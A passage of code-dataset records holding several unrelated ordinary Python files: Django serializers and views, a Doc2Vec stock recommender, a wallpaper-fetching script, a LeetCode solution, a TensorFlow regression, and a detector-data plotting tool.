"call"}, {"api_name": "numpy.float64", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 57, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 68, "usage_type": "name"}, {"api_name": "astropy.io.fits.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 69, "usage_type": "name"}, {"api_name": "astropy.io.fits.BinTableHDU.from_columns", "line_number": 70, "usage_type": "call"}, {"api_name": "astropy.io.fits.BinTableHDU", "line_number": 70, "usage_type": "attribute"}, {"api_name": "astropy.io.fits", "line_number": 70, "usage_type": "name"}]} {"seq_id": "330832152", "text": "from django.contrib.auth.models import User\nfrom friendship.models import Friend, FriendshipRequest\nfrom 
rest_framework import serializers\nfrom rest_framework.fields import CharField,IntegerField\n\n\nclass UserFriendsSerializer(serializers.HyperlinkedModelSerializer):\n    class Meta:\n        model = Friend\n        fields = ('to_user_id',)\n\nclass FriendshipRequestsSerializer(serializers.HyperlinkedModelSerializer):\n    class Meta:\n        model = FriendshipRequest\n        fields = ('id', 'from_user_id')\n\nclass SendRequestSerializer(serializers.ModelSerializer):\n    from_user_id=IntegerField()\n    to_user_id=IntegerField()\n    class Meta:\n        model = Friend\n        fields = ['from_user_id', 'to_user_id', ]\n\n    def create(self, validated_data):\n        from_user_id = validated_data['from_user_id']\n        to_user_id = validated_data['to_user_id']\n        from_user=User.objects.get(pk=from_user_id)\n        to_user=User.objects.get(pk=to_user_id)\n        Friend.objects.add_friend(\n            from_user=from_user,\n            to_user=to_user,\n        )\n        return validated_data\n\nclass DeleteFriendSerializer(serializers.ModelSerializer):\n    from_user_id=IntegerField()\n    to_user_id=IntegerField()\n    class Meta:\n        model = Friend\n        fields = ['from_user_id', 'to_user_id', ]\n\n    def destroy(self, request):\n        from_user_id = request['from_user_id']\n        to_user_id = request['to_user_id']\n        from_user=User.objects.get(pk=from_user_id)\n        to_user=User.objects.get(pk=to_user_id)\n        Friend.objects.remove_friend(\n            from_user=from_user,\n            to_user=to_user,\n        )\n        return request\n\nclass AcceptFriendRequestSerializer(serializers.ModelSerializer):\n    request_id = IntegerField()\n    class Meta:\n        model = FriendshipRequest\n        fields = ['request_id', ]\n\n    def create(self, validated_data):\n        request_id = validated_data['request_id']\n        friend_request = FriendshipRequest.objects.get(pk=request_id)\n        friend_request.accept()\n        return validated_data\n\nclass RejectFriendRequestSerializer(serializers.ModelSerializer):\n    request_id = IntegerField()\n    class Meta:\n        model = FriendshipRequest\n        fields = ['request_id', ]\n\n    def destroy(self, validated_data):\n        request_id = validated_data['request_id']\n        friend_request = FriendshipRequest.objects.get(pk=request_id)\n        friend_request.reject()\n        return validated_data", "sub_path": "deploy/back-end/friendapi/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 2465, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "friendship.models.Friend", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 12, "usage_type": "name"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 17, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "friendship.models.Friend", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", 
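A sketch of how `SendRequestSerializer` above would be driven from a DRF view: validate the posted ids, then `save()` routes into `create()`, which issues the friendship request. The payload values are illustrative, and this only runs inside a configured Django project with the app installed:

```python
payload = {"from_user_id": 1, "to_user_id": 2}  # would come from request.data
serializer = SendRequestSerializer(data=payload)
if serializer.is_valid():
    serializer.save()   # calls create(), which adds the friend request
else:
    print(serializer.errors)
```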
"line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": "friendship.models.Friend.objects.add_friend", "line_number": 29, "usage_type": "call"}, {"api_name": "friendship.models.Friend.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "friendship.models.Friend", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 37, "usage_type": "call"}, {"api_name": "friendship.models.Friend", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 46, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 46, "usage_type": "name"}, {"api_name": "friendship.models.Friend.objects.remove_friend", "line_number": 47, "usage_type": "call"}, {"api_name": "friendship.models.Friend.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "friendship.models.Friend", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 53, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 54, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 56, "usage_type": "name"}, {"api_name": "friendship.models.FriendshipRequest.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 65, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 65, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 66, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 68, "usage_type": "name"}, {"api_name": "friendship.models.FriendshipRequest.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 73, "usage_type": "name"}]} {"seq_id": "354773872", "text": "\nfrom aganlab.databases import connect_strs, getDatabaseAPIs\n\nfrom aganlab.databases.local_nlp 
import Doc2VecModelReference\nfrom aganlab.databases.remote_stock import RecoCom\n\nfrom aganlab.sim_stocks.testing import most_similar, usable_stock\n\nimport datetime\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ndef redirector(result):\n container = { 'all': [], 'A股': [], '三板股':[] }\n for code, _, _, market, _ in result:\n container['all'].append(code)\n container[market].append(code)\n for index, ls in container.items():\n container[index] = ','.join(ls)\n reco_all = container['all']\n reco_ashare = container['A股']\n reco_oc = container['三板股']\n return reco_all, reco_ashare, reco_oc\n\ndef __main__(doc2vec_id):\n _, _, sess_scope_local_nlp = getDatabaseAPIs(connect_strs['local_nlp'])\n _, _, sess_scope_remote_a = getDatabaseAPIs(connect_strs['remote_a_shares'])\n _, _, sess_scope_stock = getDatabaseAPIs(connect_strs['remote_stock'])\n\n with sess_scope_local_nlp() as sess_local_nlp, sess_scope_remote_a() as sess_remote_a, sess_scope_stock() as sess_stock:\n doc2vec = sess_local_nlp.query(Doc2VecModelReference).filter_by(id_=doc2vec_id).first().load_model()\n # all_codes = [\n # code for code in doc2vec.docvecs.doctags.keys()\n # if code not in existed\n # ]\n all_codes = doc2vec.docvecs.doctags.keys()\n for code in all_codes:\n result = most_similar(sess_remote_a, sess_local_nlp, doc2vec, code, fast_mode=True)\n reco_all, reco_ashare, reco_oc = redirector(result)\n reco_com = RecoCom(\n code = code,\n reco_codes_all = reco_all,\n reco_codes_neeq = reco_oc,\n reco_codes_astock = reco_ashare,\n update_time = datetime.datetime.now()\n )\n\n sess_stock.merge(reco_com)\n sess_stock.commit()\n", "sub_path": "sim_stocks/writing.py", "file_name": "writing.py", "file_ext": "py", "file_size_in_byte": 1947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "aganlab.databases.getDatabaseAPIs", "line_number": 27, "usage_type": "call"}, {"api_name": "aganlab.databases.connect_strs", "line_number": 27, "usage_type": "name"}, {"api_name": "aganlab.databases.getDatabaseAPIs", "line_number": 28, "usage_type": "call"}, {"api_name": "aganlab.databases.connect_strs", "line_number": 28, "usage_type": "name"}, {"api_name": "aganlab.databases.getDatabaseAPIs", "line_number": 29, "usage_type": "call"}, {"api_name": "aganlab.databases.connect_strs", "line_number": 29, "usage_type": "name"}, {"api_name": "aganlab.databases.local_nlp.Doc2VecModelReference", "line_number": 32, "usage_type": "argument"}, {"api_name": "aganlab.sim_stocks.testing.most_similar", "line_number": 39, "usage_type": "call"}, {"api_name": "aganlab.databases.remote_stock.RecoCom", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 46, "usage_type": "attribute"}]} {"seq_id": "112043862", "text": "import ConfigParser\nimport hashlib\nimport json\nimport os\nif os.name == \"nt\":\n import ctypes\nimport subprocess\nimport sys\nimport urllib\n\ndef ensureDirExists(path):\n if not os.path.exists(path) and not os.path.isdir(path):\n os.mkdir(path)\n elif not os.path.isdir(path):\n raise IOError(\"Path exists and is not a directory: %s\" % path)\n\nbaseDir = os.path.join(\n os.path.expanduser(\"~\"),\n \".groundbreaker\"\n )\nensureDirExists(baseDir)\nensureDirExists(os.path.join(baseDir, \"lists\"))\n\nconfig = 
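The writer above walks every doctag of a trained Doc2Vec model and persists its nearest neighbours per market. With the gensim 3.x API the record appears to use, the core similarity lookup is short (the model path and tag slicing below are assumptions; the record loads its model through `Doc2VecModelReference` instead):

```python
from gensim.models import Doc2Vec

model = Doc2Vec.load("doc2vec.model")  # assumed model file
for code in list(model.docvecs.doctags.keys())[:5]:
    # Returns (neighbour_tag, cosine_similarity) pairs, most similar first.
    print(code, model.docvecs.most_similar(code, topn=3))
```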
ConfigParser.SafeConfigParser()\nconfig.read(os.path.join(baseDir, \"config.ini\"))\n\napiMount = config.get(\"Ablaze:api\", \"mount\")\ntags = config.get(\"Ablaze:api\", \"filter\")\ntags = \" \".join(tags.split(\"\\n\")).strip()\n\napiHandle = urllib.urlopen(\"http://ablaze.web/api/media/random?\"+urllib.urlencode({\"q\":tags}))\nresult = apiHandle.read()\n\ndata = json.loads(result)\nif data['code'] is not 200:\n sys.exit()\n\n\nif config.get(\"Groundbreaker\", \"retrieve_strategy\") == \"link\":\n localURI = os.path.join(config.get(\"Groundbreaker\", \"link_base\"), data['result']['hash_sha1']+\".\"+data['result']['file_type'])\nelse: # config.get(\"Groundbreaker\", \"retrieve_strategy\") == \"cache\": \n localURI = os.path.join(baseDir, \"cache\", data['result']['hash_sha1']+\".\"+data['result']['file_type'])\n if not os.path.exists(localURI):\n urlHandle = urllib.urlopen(data['result']['url'])\n fileData = urlHandle.read()\n sha1 = hashlib.sha1(fileData).hexdigest()\n if sha1 != data['result']['hash_sha1']:\n raise Expression(\"Hash mismatch\")\n with open(localURI, \"wb+\", 0) as handle:\n handle.write(fileData)\n\n\n\nqueryHash = hashlib.sha1(tags).hexdigest()\nimgListPath = os.path.join(baseDir, \"lists\", queryHash)\nensureDirExists(imgListPath)\nlinkPath = os.path.join(imgListPath, data['result']['hash_sha1']+\".\"+data['result']['file_type'])\nif not os.path.exists(linkPath):\n if os.name == \"nt\":\n ctypes.windll.kernel32.CreateHardLinkW(linkPath, localURI, 0)\n else:\n os.symlink(localURI, linkPath)\n\n\nwith open(os.path.join(baseDir, \"postid\"), \"w+\") as handle:\n handle.write(\"%i\" % data['result']['id'])\n\nwith open(os.path.join(baseDir, \"sha1\"), \"w+\") as handle:\n handle.write(data['result']['hash_sha1'])\n\nif os.name == \"nt\":\n from PIL import Image\n bmpImage = Image.open(localURI)\n newPath = os.path.join(baseDir, \"bg.bmp\")\n bmpImage.save(newPath, \"BMP\")\n ctypes.windll.user32.SystemParametersInfoA(20, 0, newPath, 0)\nelif os.uname()[0].lower() == \"linux\":\n subprocess.call([\"gsettings\",\"set\",\"org.gnome.desktop.background\",\"picture-uri\",\"file://\"+localURI])\nelif os.uname()[0].lower() == \"darwin\":\n SCRIPT = \"\"\"/usr/bin/osascript< List[List[str]]:\n \"\"\"\n Given an array of strings `products` and a string `searchWord`. We want to design a system that suggests at most three product names from `products` after each character of `searchWord` is typed. Suggested products should have common prefix with the searchWord. 
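The cache branch of the script above is Python 2 (`ConfigParser`, `urllib.urlopen`), and its failure path raises the undefined name `Expression` instead of `Exception`. A Python 3 sketch of the same verify-then-write step:

```python
import hashlib
import urllib.request

def fetch_verified(url, expected_sha1, dest):
    # Download, confirm the SHA-1 digest, and only then write to disk.
    data = urllib.request.urlopen(url).read()
    if hashlib.sha1(data).hexdigest() != expected_sha1:
        raise ValueError("Hash mismatch")  # original raises undefined `Expression`
    with open(dest, "wb") as handle:
        handle.write(data)
```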
If there are more than three products with a common prefix return the three lexicographically minimums products.\n\n Return *list of lists* of the suggested `products` after each character of `searchWord` is typed.\n\n\n **Example 1:**\n\n ```\n Input: products = [\"mobile\",\"mouse\",\"moneypot\",\"monitor\",\"mousepad\"], searchWord = \"mouse\"\n Output: [\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"]\n ]\n Explanation: products sorted lexicographically = [\"mobile\",\"moneypot\",\"monitor\",\"mouse\",\"mousepad\"]\n After typing m and mo all products match and we show user [\"mobile\",\"moneypot\",\"monitor\"]\n After typing mou, mous and mouse the system suggests [\"mouse\",\"mousepad\"]\n ```\n\n **Example 2:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"havana\"\n Output: [[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"]]\n ```\n\n **Example 3:**\n\n ```\n Input: products = [\"bags\",\"baggage\",\"banner\",\"box\",\"cloths\"], searchWord = \"bags\"\n Output: [[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\"],[\"bags\"]]\n ```\n\n **Example 4:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"tatiana\"\n Output: [[],[],[],[],[],[],[]]\n ```\n\n\n\n **Constraints:**\n\n - `1 <= products.length <= 1000`\n - There are no repeated elements in `products`.\n - `1 <= Σ products[i].length <= 2 * 10^4`\n - All characters of `products[i]` are lower-case English letters.\n - `1 <= searchWord.length <= 1000`\n - All characters of `searchWord` are lower-case English letters.\n\n\n Parameters\n ----------\n products: List[str]\n searchWord: str\n\n Returns\n -------\n int\n\n Examples\n --------\n\n Notes\n -----\n\n References\n ---------\n\n \"\"\"\n from bisect import bisect_left\n i, res, prefix = 0, [], ''\n products.sort()\n for ch in searchWord:\n prefix = prefix + ch\n i = bisect_left(products, prefix, i)\n res.append([w for w in products[i:i+3] if w.startswith(prefix)])\n return res\n\n def suggestedProducts01(self, products: List[str], searchWord: str) -> List[List[str]]:\n from collections import defaultdict\n\n class Trie:\n def __init__(self):\n self.sub = defaultdict(Trie)\n self.suggestions = []\n\n def add_suggestions(self, word):\n if len(self.suggestions) < 3:\n self.suggestions.append(word)\n\n products = sorted(products)\n root = Trie()\n for word in products:\n node = root\n for ch in word:\n node = node.sub[ch]\n node.add_suggestions(word)\n\n res, node = [], root\n for ch in searchWord:\n node = node.sub[ch]\n res.append(node.suggestions)\n\n return res\n\n\n\n", "sub_path": "01268/search_suggestions_system.py", "file_name": "search_suggestions_system.py", "file_ext": "py", "file_size_in_byte": 3569, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}, {"api_name": "bisect.bisect_left", "line_number": 85, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 89, "usage_type": "name"}]} {"seq_id": "58193997", "text": "#工具准备\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport tensorflow as tf\r\nfrom sklearn.preprocessing import scale\r\nimport numpy as np\r\n\r\n#函数准备\r\ndef model(w, x, b):\r\n return x @ w + b\r\n\r\ndef loss(x, y, w, b):\r\n err = y - model(w, x, b)\r\n return tf.reduce_mean(tf.square(err))\r\n\r\ndef 
gard(x, y, w, b):\r\n    with tf.GradientTape() as tape:\r\n        loss_ = loss(x, y, w, b)\r\n    return tape.gradient(loss_, [w, b])\r\n\r\n# Data preparation\r\nboston = tf.keras.datasets.boston_housing\r\n(x_train, y_train), (x_test, y_test) = boston.load_data()\r\nx_train, x_test = tf.cast(scale(x_train), tf.float32), tf.cast(scale(x_test), tf.float32)\r\n\r\n# Model setup\r\nw = tf.Variable(tf.random.normal([13, 1], mean=0, stddev=1.), dtype=tf.float32)\r\nb = tf.Variable(tf.zeros(1), dtype=tf.float32)\r\ntrain_epochs = 50\r\nlearning_rate = 0.001\r\nbatch_size = 10\r\noptimizer = tf.keras.optimizers.SGD(learning_rate)\r\n\r\n# Model training\r\nfor epoch in range(train_epochs):\r\n    for step in range(int(len(x_train) / batch_size)):\r\n        xs = x_train[step * batch_size:(step + 1) * batch_size]\r\n        ys = y_train[step * batch_size:(step + 1) * batch_size]\r\n\r\n        gards = gard(xs, ys, w, b)\r\n        optimizer.apply_gradients(zip(gards, [w, b]))\r\n\r\n    train_loss = loss(x_train, y_train, w, b)  # total loss for the current epoch\r\n    print(\"epoch:{:3d},train_loss:{:.4f}\".format(epoch, train_loss))\r\n# Training results\r\nprint('w:',w.numpy().transpose(), '\nb:', b.numpy())\r\nnp.random.seed(int(np.random.rand()*1000))\r\nhouse_id = np.random.randint(0, len(x_test))\r\nprint('testNum',len(x_test))\r\npre = model(w, x_test, b)[house_id]\r\nprint(\"Sample {}: predicted value {:.4f}, actual value {}\".format(house_id, pre[0], y_test[house_id]))", "sub_path": "第七周作业/boston.py", "file_name": "boston.py", "file_ext": "py", "file_size_in_byte": 1734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random.normal", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.SGD", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}]} {"seq_id": "580071156", "text": "# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render, redirect\n\n\n\n# Import a class\nfrom django.http import HttpResponse\n\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom 
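The training loop in the boston.py record above is plain mini-batch gradient descent on a linear model. The same mechanics in miniature, small enough to verify the gradients by hand (pure TensorFlow 2, toy data):

```python
import tensorflow as tf

# One hand-checkable gradient for loss = mean((y - (w*x + b))^2) at w=b=0.
w = tf.Variable(0.0)
b = tf.Variable(0.0)
x = tf.constant([1.0, 2.0])
y = tf.constant([2.0, 4.0])  # true relation: y = 2x

with tf.GradientTape() as tape:
    loss = tf.reduce_mean(tf.square(y - (w * x + b)))
dw, db = tape.gradient(loss, [w, b])
# d/dw = mean(-2*x*(y - w*x - b)) = -(2*1*2 + 2*2*4)/2 = -10
# d/db = mean(-2*(y - w*x - b))   = -(2*2 + 2*4)/2     = -6
print(float(dw), float(db))  # -10.0 -6.0
```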
django.views.generic import ListView, CreateView, UpdateView, DeleteView\n\n# Import the form we created\nfrom app.mascota.form import MascotaForm \n\n# Import the model\nfrom app.mascota.models import Mascota\n\n# Create your views here.\ndef index(request):\n\treturn render(request, 'mascota/index.html')\n\n\n# Create a view (this one is function-based)\ndef mascota_view(request):\n\t# If the request is a POST\n\tif request.method == 'POST':\n\t\t# receive the data being sent in the POST of our form\n\t\tform = MascotaForm(request.POST)\n\t\t# check whether the submitted data is valid; if so, save it\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t# if it passes, redirect with the redirect shortcut (it must be imported) to a url, using the namespace we already defined\n\t\treturn redirect('mascota:index')\n\telse:\n\t\t# if it is not a POST, go back to the form\n\t\tform = MascotaForm()\n\t# Finally send the response to the request (without forgetting to pass the context in a dictionary)\n\treturn render (request, 'mascota/mascota_form.html', {'form':form})\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\t\t\t\t\t# CLASS-BASED VIEWS (important: import views.generic)\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\n# View to list records\n\nclass MascotaList(ListView):\n\t# indicate which model to use\n\tmodel = Mascota \n\t# indicate which template receives the context\n\ttemplate_name = 'mascota/mascota_list.html'\n\n# View to create records\n\nclass MascotaCreate(CreateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\t\n# View to update\nclass MascotaUpdate(UpdateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n# View to delete\nclass MascotaDelete(DeleteView):\n\tmodel = Mascota\n\ttemplate_name = 'mascota/mascota_delete.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n\n\n", "sub_path": "refugio/app/mascota/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2512, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 50, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 52, "usage_type": "name"}, {"api_name": "django.views.generic.CreateView", "line_number": 58, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 59, "usage_type": "name"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 60, "usage_type": "name"}, {"api_name": 
"django.core.urlresolvers.reverse_lazy", "line_number": 62, "usage_type": "call"}, {"api_name": "django.views.generic.UpdateView", "line_number": 65, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 66, "usage_type": "name"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 67, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 69, "usage_type": "call"}, {"api_name": "django.views.generic.DeleteView", "line_number": 72, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 73, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 75, "usage_type": "call"}]} {"seq_id": "59183828", "text": "#!/usr/bin/env python3\n\nfrom scipp import array, DataArray, ones_like\nfrom argparse import ArgumentParser\nimport h5py, os\nimport matplotlib.pyplot as plt\n\n#nspertick = 11.356860963629653 # ESS clock is 88052500 Hz\n\n# Convert Ring and FEN to numbers or if not set, to 'A'\ndef id2chr(id):\n if id == -1:\n return 'any'\n else:\n return f'{id:02}'\n\ndef readtoscipp(filename):\n\n f = h5py.File(filename, 'r')\n dat = f['loki_readouts']\n\n #time = dat['EventTimeHigh'].astype('int')+dat['EventTimeLow'].astype('int')*nspertick/1000000000\n #time = array(values=time, dims=['event'], unit='sec')\n\n tube = array(values=dat['TubeId'].astype('int'), dims=['event'])\n ring = array(values=dat['RingId'].astype('int'), dims=['event'])\n fen = array(values=dat['FENId'].astype('int'), dims=['event'])\n\n ampl_a = array(values=1.0 * dat['AmpA'].astype('int'), dims=['event'], unit='mV')\n ampl_b = array(values=1.0 * dat['AmpB'].astype('int'), dims=['event'], unit='mV')\n ampl_c = array(values=1.0 * dat['AmpC'].astype('int'), dims=['event'], unit='mV')\n ampl_d = array(values=1.0 * dat['AmpD'].astype('int'), dims=['event'], unit='mV')\n\n events = ones_like(1. 
* tube)\n events.unit = 'counts'\n\n pos = (ampl_a + ampl_b) / (ampl_a + ampl_b + ampl_c + ampl_d)\n straw = (ampl_b + ampl_d) / (ampl_a + ampl_b + ampl_c + ampl_d)\n\n return DataArray(data=events,\n coords={'pos': pos, 'straw': straw, # 'time': time,\n 'tube': tube, 'ring': ring, 'fen': fen,\n 'amplitude_a': ampl_a, 'amplitude_b': ampl_b,\n 'amplitude_c': ampl_c, 'amplitude_d': ampl_d})\n\n\ndef load_and_save(args):\n dat = readtoscipp(args.filename)\n\n rgrp = array(dims=['ring'], values=[args.ring])\n fgrp = array(dims=['fen'], values=[args.fen])\n\n fig, ax = plt.subplots(4,2, figsize=(16,16))\n #fig.tight_layout()\n\n for i in range(args.tubes):\n print(f'processing ring {id2chr(args.ring)}, fen {id2chr(args.fen)}, tube {i}')\n tgrp = array(dims=['tube'], values=[i])\n if args.ring == -1 and args.fen == -1:\n grp = dat.group(tgrp).bins.concat()\n elif args.ring == -1 and args.fen != -1:\n grp = dat.group(fgrp, tgrp).bins.concat()\n elif args.ring != -1 and args.fen == -1:\n grp = dat.group(rgrp, tgrp).bins.concat()\n else:\n grp = dat.group(rgrp, fgrp, tgrp).bins.concat()\n\n yi = i // 2\n xi = i % 2\n cax = ax[yi, xi]\n grp.hist(pos=args.bin, straw=args.bin).plot(aspect=1.,norm='log', ax=cax)\n cax.title.set_text(f'Tube {i}')\n cax.set_xlim(args.xmin, args.xmax)\n cax.set_ylim(args.ymin, args.ymax)\n cax.yaxis.tick_left()\n cax.yaxis.set_label_position('left')\n if i <= 5:\n cax.set(xlabel='', ylabel='pos')\n else:\n cax.set(xlabel='straw', ylabel='pos')\n\n plt.suptitle(f'Ring: {id2chr(args.ring)}, FEN: {id2chr(args.fen)}, Tubes 0 - 8', size='28')\n plt.savefig(os.path.join(args.outdir, f'strawpos_{id2chr(args.ring)}_{id2chr(args.fen)}.png'))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(prog='dattoplot', description=__doc__)\n parser.add_argument('filename', type=str, nargs='?', default=\"\",\n help='.h5 file to load and plot')\n parser.add_argument('-o','--outdir', type=str, default=\"\",\n help='output directory')\n parser.add_argument('-r','--ring', type=int, default=-1, help='Ring Id (default all rings)')\n parser.add_argument('-f','--fen', type=int, default=-1, help='FEN Id (default all fens)')\n parser.add_argument('-t','--tubes', type=int, default=8, help='number of tubes')\n parser.add_argument('--xmin', type=float, default=0.0, help='min x-value')\n parser.add_argument('--xmax', type=float, default=1.0, help='max x-value')\n parser.add_argument('--ymin', type=float, default=0.0, help='min y-value')\n parser.add_argument('--ymax', type=float, default=1.0, help='max y-value')\n parser.add_argument('-b', '--bin', type=int, default=200, help='histogram bin size')\n\n args = parser.parse_args()\n\n load_and_save(args)\n", "sub_path": "detectors/loki/h5tools/strawpos.py", "file_name": "strawpos.py", "file_ext": "py", "file_size_in_byte": 4186, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 